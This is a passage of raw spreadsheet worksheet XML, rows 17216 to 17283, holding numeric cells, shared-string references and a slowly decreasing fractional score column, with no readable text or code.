      </c>
      <c r="B17216" s="2">
        <v>5.6023499E7</v>
      </c>
      <c r="C17216" s="2" t="s">
        <v>16598</v>
      </c>
      <c r="D17216" s="2">
        <v>1.0</v>
      </c>
      <c r="E17216" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17216" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="17217" ht="15.75" customHeight="1">
      <c r="A17217" s="1">
        <v>18118.0</v>
      </c>
      <c r="B17217" s="2">
        <v>5.1763358E7</v>
      </c>
      <c r="C17217" s="2" t="s">
        <v>16599</v>
      </c>
      <c r="D17217" s="2">
        <v>1.0</v>
      </c>
      <c r="E17217" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17217" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="17218" ht="15.75" customHeight="1">
      <c r="A17218" s="1">
        <v>24667.0</v>
      </c>
      <c r="B17218" s="2">
        <v>1.1556136E7</v>
      </c>
      <c r="C17218" s="2" t="s">
        <v>16600</v>
      </c>
      <c r="D17218" s="2">
        <v>1.0</v>
      </c>
      <c r="E17218" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17218" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="17219" ht="15.75" customHeight="1">
      <c r="A17219" s="1">
        <v>27307.0</v>
      </c>
      <c r="B17219" s="2">
        <v>2.1366761E7</v>
      </c>
      <c r="C17219" s="2" t="s">
        <v>16601</v>
      </c>
      <c r="D17219" s="2">
        <v>1.0</v>
      </c>
      <c r="E17219" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17219" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="17220" ht="15.75" customHeight="1">
      <c r="A17220" s="1">
        <v>7873.0</v>
      </c>
      <c r="B17220" s="2">
        <v>5.2408094E7</v>
      </c>
      <c r="C17220" s="2" t="s">
        <v>16602</v>
      </c>
      <c r="D17220" s="2">
        <v>1.0</v>
      </c>
      <c r="E17220" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17220" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="17221" ht="15.75" customHeight="1">
      <c r="A17221" s="1">
        <v>27309.0</v>
      </c>
      <c r="B17221" s="2">
        <v>2.1366761E7</v>
      </c>
      <c r="C17221" s="2" t="s">
        <v>16603</v>
      </c>
      <c r="D17221" s="2">
        <v>1.0</v>
      </c>
      <c r="E17221" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17221" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="17222" ht="15.75" customHeight="1">
      <c r="A17222" s="1">
        <v>11854.0</v>
      </c>
      <c r="B17222" s="2">
        <v>2.4810034E7</v>
      </c>
      <c r="C17222" s="2" t="s">
        <v>16604</v>
      </c>
      <c r="D17222" s="2">
        <v>1.0</v>
      </c>
      <c r="E17222" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17222" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="17223" ht="15.75" customHeight="1">
      <c r="A17223" s="1">
        <v>20082.0</v>
      </c>
      <c r="B17223" s="2">
        <v>9168978.0</v>
      </c>
      <c r="C17223" s="2" t="s">
        <v>16605</v>
      </c>
      <c r="D17223" s="2">
        <v>1.0</v>
      </c>
      <c r="E17223" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17223" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="17224" ht="15.75" customHeight="1">
      <c r="A17224" s="1">
        <v>14738.0</v>
      </c>
      <c r="B17224" s="2">
        <v>4.07039E7</v>
      </c>
      <c r="C17224" s="2" t="s">
        <v>16606</v>
      </c>
      <c r="D17224" s="2">
        <v>1.0</v>
      </c>
      <c r="E17224" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17224" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="17225" ht="15.75" customHeight="1">
      <c r="A17225" s="1">
        <v>29302.0</v>
      </c>
      <c r="B17225" s="2">
        <v>3.1239326E7</v>
      </c>
      <c r="C17225" s="2" t="s">
        <v>16607</v>
      </c>
      <c r="D17225" s="2">
        <v>1.0</v>
      </c>
      <c r="E17225" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17225" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="17226" ht="15.75" customHeight="1">
      <c r="A17226" s="1">
        <v>14216.0</v>
      </c>
      <c r="B17226" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C17226" s="2" t="s">
        <v>16608</v>
      </c>
      <c r="D17226" s="2">
        <v>1.0</v>
      </c>
      <c r="E17226" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17226" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="17227" ht="15.75" customHeight="1">
      <c r="A17227" s="1">
        <v>14842.0</v>
      </c>
      <c r="B17227" s="2">
        <v>4.1036244E7</v>
      </c>
      <c r="C17227" s="2" t="s">
        <v>16609</v>
      </c>
      <c r="D17227" s="2">
        <v>1.0</v>
      </c>
      <c r="E17227" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17227" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="17228" ht="15.75" customHeight="1">
      <c r="A17228" s="1">
        <v>26415.0</v>
      </c>
      <c r="B17228" s="2">
        <v>1.7141075E7</v>
      </c>
      <c r="C17228" s="2" t="s">
        <v>16610</v>
      </c>
      <c r="D17228" s="2">
        <v>1.0</v>
      </c>
      <c r="E17228" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17228" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="17229" ht="15.75" customHeight="1">
      <c r="A17229" s="1">
        <v>33102.0</v>
      </c>
      <c r="B17229" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C17229" s="2" t="s">
        <v>16611</v>
      </c>
      <c r="D17229" s="2">
        <v>1.0</v>
      </c>
      <c r="E17229" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17229" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="17230" ht="15.75" customHeight="1">
      <c r="A17230" s="1">
        <v>33853.0</v>
      </c>
      <c r="B17230" s="2">
        <v>9042232.0</v>
      </c>
      <c r="C17230" s="2" t="s">
        <v>16612</v>
      </c>
      <c r="D17230" s="2">
        <v>1.0</v>
      </c>
      <c r="E17230" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17230" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="17231" ht="15.75" customHeight="1">
      <c r="A17231" s="1">
        <v>14111.0</v>
      </c>
      <c r="B17231" s="2">
        <v>3.7776793E7</v>
      </c>
      <c r="C17231" s="2" t="s">
        <v>16613</v>
      </c>
      <c r="D17231" s="2">
        <v>1.0</v>
      </c>
      <c r="E17231" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17231" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="17232" ht="15.75" customHeight="1">
      <c r="A17232" s="1">
        <v>24309.0</v>
      </c>
      <c r="B17232" s="2">
        <v>1.0581376E7</v>
      </c>
      <c r="C17232" s="2" t="s">
        <v>16614</v>
      </c>
      <c r="D17232" s="2">
        <v>1.0</v>
      </c>
      <c r="E17232" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17232" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="17233" ht="15.75" customHeight="1">
      <c r="A17233" s="1">
        <v>33817.0</v>
      </c>
      <c r="B17233" s="2">
        <v>8905797.0</v>
      </c>
      <c r="C17233" s="2" t="s">
        <v>16501</v>
      </c>
      <c r="D17233" s="2">
        <v>1.0</v>
      </c>
      <c r="E17233" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17233" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="17234" ht="15.75" customHeight="1">
      <c r="A17234" s="1">
        <v>34269.0</v>
      </c>
      <c r="B17234" s="2">
        <v>1.5111874E7</v>
      </c>
      <c r="C17234" s="2" t="s">
        <v>16615</v>
      </c>
      <c r="D17234" s="2">
        <v>1.0</v>
      </c>
      <c r="E17234" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17234" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="17235" ht="15.75" customHeight="1">
      <c r="A17235" s="1">
        <v>3418.0</v>
      </c>
      <c r="B17235" s="2">
        <v>3.8133462E7</v>
      </c>
      <c r="C17235" s="2" t="s">
        <v>16616</v>
      </c>
      <c r="D17235" s="2">
        <v>1.0</v>
      </c>
      <c r="E17235" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17235" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17236" ht="15.75" customHeight="1">
      <c r="A17236" s="1">
        <v>4872.0</v>
      </c>
      <c r="B17236" s="2">
        <v>4.384714E7</v>
      </c>
      <c r="C17236" s="2" t="s">
        <v>16617</v>
      </c>
      <c r="D17236" s="2">
        <v>1.0</v>
      </c>
      <c r="E17236" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17236" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17237" ht="15.75" customHeight="1">
      <c r="A17237" s="1">
        <v>5443.0</v>
      </c>
      <c r="B17237" s="2">
        <v>4.5625342E7</v>
      </c>
      <c r="C17237" s="2" t="s">
        <v>16618</v>
      </c>
      <c r="D17237" s="2">
        <v>1.0</v>
      </c>
      <c r="E17237" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17237" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17238" ht="15.75" customHeight="1">
      <c r="A17238" s="1">
        <v>6765.0</v>
      </c>
      <c r="B17238" s="2">
        <v>4.9419737E7</v>
      </c>
      <c r="C17238" s="2" t="s">
        <v>16619</v>
      </c>
      <c r="D17238" s="2">
        <v>1.0</v>
      </c>
      <c r="E17238" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17238" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17239" ht="15.75" customHeight="1">
      <c r="A17239" s="1">
        <v>6792.0</v>
      </c>
      <c r="B17239" s="2">
        <v>4.9500361E7</v>
      </c>
      <c r="C17239" s="2" t="s">
        <v>16620</v>
      </c>
      <c r="D17239" s="2">
        <v>1.0</v>
      </c>
      <c r="E17239" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17239" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17240" ht="15.75" customHeight="1">
      <c r="A17240" s="1">
        <v>8509.0</v>
      </c>
      <c r="B17240" s="2">
        <v>5.4060699E7</v>
      </c>
      <c r="C17240" s="2" t="s">
        <v>16621</v>
      </c>
      <c r="D17240" s="2">
        <v>1.0</v>
      </c>
      <c r="E17240" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17240" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17241" ht="15.75" customHeight="1">
      <c r="A17241" s="1">
        <v>8785.0</v>
      </c>
      <c r="B17241" s="2">
        <v>5.4591414E7</v>
      </c>
      <c r="C17241" s="2" t="s">
        <v>16622</v>
      </c>
      <c r="D17241" s="2">
        <v>1.0</v>
      </c>
      <c r="E17241" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17241" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17242" ht="15.75" customHeight="1">
      <c r="A17242" s="1">
        <v>11183.0</v>
      </c>
      <c r="B17242" s="2">
        <v>1.9756782E7</v>
      </c>
      <c r="C17242" s="2" t="s">
        <v>16623</v>
      </c>
      <c r="D17242" s="2">
        <v>1.0</v>
      </c>
      <c r="E17242" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17242" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17243" ht="15.75" customHeight="1">
      <c r="A17243" s="1">
        <v>11867.0</v>
      </c>
      <c r="B17243" s="2">
        <v>2.4900431E7</v>
      </c>
      <c r="C17243" s="2" t="s">
        <v>16624</v>
      </c>
      <c r="D17243" s="2">
        <v>1.0</v>
      </c>
      <c r="E17243" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17243" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17244" ht="15.75" customHeight="1">
      <c r="A17244" s="1">
        <v>12817.0</v>
      </c>
      <c r="B17244" s="2">
        <v>3.1607367E7</v>
      </c>
      <c r="C17244" s="2" t="s">
        <v>16625</v>
      </c>
      <c r="D17244" s="2">
        <v>1.0</v>
      </c>
      <c r="E17244" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17244" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17245" ht="15.75" customHeight="1">
      <c r="A17245" s="1">
        <v>13110.0</v>
      </c>
      <c r="B17245" s="2">
        <v>3.3576361E7</v>
      </c>
      <c r="C17245" s="2" t="s">
        <v>16626</v>
      </c>
      <c r="D17245" s="2">
        <v>1.0</v>
      </c>
      <c r="E17245" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17245" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17246" ht="15.75" customHeight="1">
      <c r="A17246" s="1">
        <v>15906.0</v>
      </c>
      <c r="B17246" s="2">
        <v>4.4628828E7</v>
      </c>
      <c r="C17246" s="2" t="s">
        <v>16627</v>
      </c>
      <c r="D17246" s="2">
        <v>1.0</v>
      </c>
      <c r="E17246" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17246" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17247" ht="15.75" customHeight="1">
      <c r="A17247" s="1">
        <v>16167.0</v>
      </c>
      <c r="B17247" s="2">
        <v>4.5625413E7</v>
      </c>
      <c r="C17247" s="2" t="s">
        <v>16628</v>
      </c>
      <c r="D17247" s="2">
        <v>1.0</v>
      </c>
      <c r="E17247" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17247" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17248" ht="15.75" customHeight="1">
      <c r="A17248" s="1">
        <v>20081.0</v>
      </c>
      <c r="B17248" s="2">
        <v>916538.0</v>
      </c>
      <c r="C17248" s="2" t="s">
        <v>16629</v>
      </c>
      <c r="D17248" s="2">
        <v>1.0</v>
      </c>
      <c r="E17248" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17248" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17249" ht="15.75" customHeight="1">
      <c r="A17249" s="1">
        <v>20227.0</v>
      </c>
      <c r="B17249" s="2">
        <v>1.0783211E7</v>
      </c>
      <c r="C17249" s="2" t="s">
        <v>16630</v>
      </c>
      <c r="D17249" s="2">
        <v>1.0</v>
      </c>
      <c r="E17249" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17249" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17250" ht="15.75" customHeight="1">
      <c r="A17250" s="1">
        <v>21451.0</v>
      </c>
      <c r="B17250" s="2">
        <v>2.2631532E7</v>
      </c>
      <c r="C17250" s="2" t="s">
        <v>16631</v>
      </c>
      <c r="D17250" s="2">
        <v>1.0</v>
      </c>
      <c r="E17250" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17250" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17251" ht="15.75" customHeight="1">
      <c r="A17251" s="1">
        <v>22730.0</v>
      </c>
      <c r="B17251" s="2">
        <v>4.3954147E7</v>
      </c>
      <c r="C17251" s="2" t="s">
        <v>16632</v>
      </c>
      <c r="D17251" s="2">
        <v>1.0</v>
      </c>
      <c r="E17251" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17251" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17252" ht="15.75" customHeight="1">
      <c r="A17252" s="1">
        <v>23425.0</v>
      </c>
      <c r="B17252" s="2">
        <v>5642154.0</v>
      </c>
      <c r="C17252" s="2" t="s">
        <v>16633</v>
      </c>
      <c r="D17252" s="2">
        <v>1.0</v>
      </c>
      <c r="E17252" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17252" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17253" ht="15.75" customHeight="1">
      <c r="A17253" s="1">
        <v>23790.0</v>
      </c>
      <c r="B17253" s="2">
        <v>7717008.0</v>
      </c>
      <c r="C17253" s="2" t="s">
        <v>16634</v>
      </c>
      <c r="D17253" s="2">
        <v>1.0</v>
      </c>
      <c r="E17253" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17253" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17254" ht="15.75" customHeight="1">
      <c r="A17254" s="1">
        <v>24173.0</v>
      </c>
      <c r="B17254" s="2">
        <v>1.0202058E7</v>
      </c>
      <c r="C17254" s="2" t="s">
        <v>16635</v>
      </c>
      <c r="D17254" s="2">
        <v>1.0</v>
      </c>
      <c r="E17254" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17254" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17255" ht="15.75" customHeight="1">
      <c r="A17255" s="1">
        <v>25489.0</v>
      </c>
      <c r="B17255" s="2">
        <v>1.4037372E7</v>
      </c>
      <c r="C17255" s="2" t="s">
        <v>16636</v>
      </c>
      <c r="D17255" s="2">
        <v>1.0</v>
      </c>
      <c r="E17255" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17255" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17256" ht="15.75" customHeight="1">
      <c r="A17256" s="1">
        <v>25660.0</v>
      </c>
      <c r="B17256" s="2">
        <v>1.4523187E7</v>
      </c>
      <c r="C17256" s="2" t="s">
        <v>16637</v>
      </c>
      <c r="D17256" s="2">
        <v>1.0</v>
      </c>
      <c r="E17256" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17256" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17257" ht="15.75" customHeight="1">
      <c r="A17257" s="1">
        <v>25787.0</v>
      </c>
      <c r="B17257" s="2">
        <v>1.4671598E7</v>
      </c>
      <c r="C17257" s="2" t="s">
        <v>16638</v>
      </c>
      <c r="D17257" s="2">
        <v>1.0</v>
      </c>
      <c r="E17257" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17257" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17258" ht="15.75" customHeight="1">
      <c r="A17258" s="1">
        <v>25910.0</v>
      </c>
      <c r="B17258" s="2">
        <v>1.506872E7</v>
      </c>
      <c r="C17258" s="2" t="s">
        <v>16639</v>
      </c>
      <c r="D17258" s="2">
        <v>1.0</v>
      </c>
      <c r="E17258" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17258" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17259" ht="15.75" customHeight="1">
      <c r="A17259" s="1">
        <v>25942.0</v>
      </c>
      <c r="B17259" s="2">
        <v>1.5230907E7</v>
      </c>
      <c r="C17259" s="2" t="s">
        <v>16640</v>
      </c>
      <c r="D17259" s="2">
        <v>1.0</v>
      </c>
      <c r="E17259" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17259" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17260" ht="15.75" customHeight="1">
      <c r="A17260" s="1">
        <v>25993.0</v>
      </c>
      <c r="B17260" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C17260" s="2" t="s">
        <v>16641</v>
      </c>
      <c r="D17260" s="2">
        <v>1.0</v>
      </c>
      <c r="E17260" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17260" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17261" ht="15.75" customHeight="1">
      <c r="A17261" s="1">
        <v>25994.0</v>
      </c>
      <c r="B17261" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C17261" s="2" t="s">
        <v>16642</v>
      </c>
      <c r="D17261" s="2">
        <v>1.0</v>
      </c>
      <c r="E17261" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17261" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17262" ht="15.75" customHeight="1">
      <c r="A17262" s="1">
        <v>26039.0</v>
      </c>
      <c r="B17262" s="2">
        <v>1.5452794E7</v>
      </c>
      <c r="C17262" s="2" t="s">
        <v>16643</v>
      </c>
      <c r="D17262" s="2">
        <v>1.0</v>
      </c>
      <c r="E17262" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17262" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17263" ht="15.75" customHeight="1">
      <c r="A17263" s="1">
        <v>27945.0</v>
      </c>
      <c r="B17263" s="2">
        <v>2.3846991E7</v>
      </c>
      <c r="C17263" s="2" t="s">
        <v>16644</v>
      </c>
      <c r="D17263" s="2">
        <v>1.0</v>
      </c>
      <c r="E17263" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17263" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17264" ht="15.75" customHeight="1">
      <c r="A17264" s="1">
        <v>29222.0</v>
      </c>
      <c r="B17264" s="2">
        <v>3.0823924E7</v>
      </c>
      <c r="C17264" s="2" t="s">
        <v>16645</v>
      </c>
      <c r="D17264" s="2">
        <v>1.0</v>
      </c>
      <c r="E17264" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17264" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17265" ht="15.75" customHeight="1">
      <c r="A17265" s="1">
        <v>30906.0</v>
      </c>
      <c r="B17265" s="2">
        <v>4.677977E7</v>
      </c>
      <c r="C17265" s="2" t="s">
        <v>16646</v>
      </c>
      <c r="D17265" s="2">
        <v>1.0</v>
      </c>
      <c r="E17265" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17265" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17266" ht="15.75" customHeight="1">
      <c r="A17266" s="1">
        <v>31740.0</v>
      </c>
      <c r="B17266" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C17266" s="2" t="s">
        <v>16647</v>
      </c>
      <c r="D17266" s="2">
        <v>1.0</v>
      </c>
      <c r="E17266" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17266" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17267" ht="15.75" customHeight="1">
      <c r="A17267" s="1">
        <v>33219.0</v>
      </c>
      <c r="B17267" s="2">
        <v>7242938.0</v>
      </c>
      <c r="C17267" s="2" t="s">
        <v>16648</v>
      </c>
      <c r="D17267" s="2">
        <v>1.0</v>
      </c>
      <c r="E17267" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17267" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17268" ht="15.75" customHeight="1">
      <c r="A17268" s="1">
        <v>33859.0</v>
      </c>
      <c r="B17268" s="2">
        <v>9050849.0</v>
      </c>
      <c r="C17268" s="2" t="s">
        <v>16649</v>
      </c>
      <c r="D17268" s="2">
        <v>1.0</v>
      </c>
      <c r="E17268" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17268" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17269" ht="15.75" customHeight="1">
      <c r="A17269" s="1">
        <v>33978.0</v>
      </c>
      <c r="B17269" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C17269" s="2" t="s">
        <v>16650</v>
      </c>
      <c r="D17269" s="2">
        <v>1.0</v>
      </c>
      <c r="E17269" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17269" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="17270" ht="15.75" customHeight="1">
      <c r="A17270" s="1">
        <v>18432.0</v>
      </c>
      <c r="B17270" s="2">
        <v>5.2721414E7</v>
      </c>
      <c r="C17270" s="2" t="s">
        <v>16651</v>
      </c>
      <c r="D17270" s="2">
        <v>1.0</v>
      </c>
      <c r="E17270" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17270" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="17271" ht="15.75" customHeight="1">
      <c r="A17271" s="1">
        <v>25986.0</v>
      </c>
      <c r="B17271" s="2">
        <v>1.5324952E7</v>
      </c>
      <c r="C17271" s="2" t="s">
        <v>16652</v>
      </c>
      <c r="D17271" s="2">
        <v>1.0</v>
      </c>
      <c r="E17271" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17271" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="17272" ht="15.75" customHeight="1">
      <c r="A17272" s="1">
        <v>27695.0</v>
      </c>
      <c r="B17272" s="2">
        <v>2.3011771E7</v>
      </c>
      <c r="C17272" s="2" t="s">
        <v>16653</v>
      </c>
      <c r="D17272" s="2">
        <v>1.0</v>
      </c>
      <c r="E17272" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17272" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="17273" ht="15.75" customHeight="1">
      <c r="A17273" s="1">
        <v>25683.0</v>
      </c>
      <c r="B17273" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C17273" s="2" t="s">
        <v>16654</v>
      </c>
      <c r="D17273" s="2">
        <v>1.0</v>
      </c>
      <c r="E17273" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17273" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="17274" ht="15.75" customHeight="1">
      <c r="A17274" s="1">
        <v>2233.0</v>
      </c>
      <c r="B17274" s="2">
        <v>3.2278649E7</v>
      </c>
      <c r="C17274" s="2" t="s">
        <v>16655</v>
      </c>
      <c r="D17274" s="2">
        <v>1.0</v>
      </c>
      <c r="E17274" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17274" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17275" ht="15.75" customHeight="1">
      <c r="A17275" s="1">
        <v>12556.0</v>
      </c>
      <c r="B17275" s="2">
        <v>2.9882524E7</v>
      </c>
      <c r="C17275" s="2" t="s">
        <v>16656</v>
      </c>
      <c r="D17275" s="2">
        <v>1.0</v>
      </c>
      <c r="E17275" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17275" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17276" ht="15.75" customHeight="1">
      <c r="A17276" s="1">
        <v>16711.0</v>
      </c>
      <c r="B17276" s="2">
        <v>4.7425716E7</v>
      </c>
      <c r="C17276" s="2" t="s">
        <v>16657</v>
      </c>
      <c r="D17276" s="2">
        <v>1.0</v>
      </c>
      <c r="E17276" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17276" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17277" ht="15.75" customHeight="1">
      <c r="A17277" s="1">
        <v>18199.0</v>
      </c>
      <c r="B17277" s="2">
        <v>5.2036616E7</v>
      </c>
      <c r="C17277" s="2" t="s">
        <v>16658</v>
      </c>
      <c r="D17277" s="2">
        <v>1.0</v>
      </c>
      <c r="E17277" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17277" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17278" ht="15.75" customHeight="1">
      <c r="A17278" s="1">
        <v>22089.0</v>
      </c>
      <c r="B17278" s="2">
        <v>3.0761877E7</v>
      </c>
      <c r="C17278" s="2" t="s">
        <v>16659</v>
      </c>
      <c r="D17278" s="2">
        <v>1.0</v>
      </c>
      <c r="E17278" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17278" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17279" ht="15.75" customHeight="1">
      <c r="A17279" s="1">
        <v>23063.0</v>
      </c>
      <c r="B17279" s="2">
        <v>5037787.0</v>
      </c>
      <c r="C17279" s="2" t="s">
        <v>16660</v>
      </c>
      <c r="D17279" s="2">
        <v>1.0</v>
      </c>
      <c r="E17279" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17279" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17280" ht="15.75" customHeight="1">
      <c r="A17280" s="1">
        <v>29797.0</v>
      </c>
      <c r="B17280" s="2">
        <v>3.5113688E7</v>
      </c>
      <c r="C17280" s="2" t="s">
        <v>16661</v>
      </c>
      <c r="D17280" s="2">
        <v>1.0</v>
      </c>
      <c r="E17280" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17280" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17281" ht="15.75" customHeight="1">
      <c r="A17281" s="1">
        <v>31641.0</v>
      </c>
      <c r="B17281" s="2">
        <v>5147249.0</v>
      </c>
      <c r="C17281" s="2" t="s">
        <v>16662</v>
      </c>
      <c r="D17281" s="2">
        <v>1.0</v>
      </c>
      <c r="E17281" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17281" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17282" ht="15.75" customHeight="1">
      <c r="A17282" s="1">
        <v>33563.0</v>
      </c>
      <c r="B17282" s="2">
        <v>8219954.0</v>
      </c>
      <c r="C17282" s="2" t="s">
        <v>16663</v>
      </c>
      <c r="D17282" s="2">
        <v>1.0</v>
      </c>
      <c r="E17282" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17282" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="17283" ht="15.75" customHeight="1">
      <c r="A17283" s="1">
        <v>32009.0</v>
      </c>
      <c r="B17283" s="2">
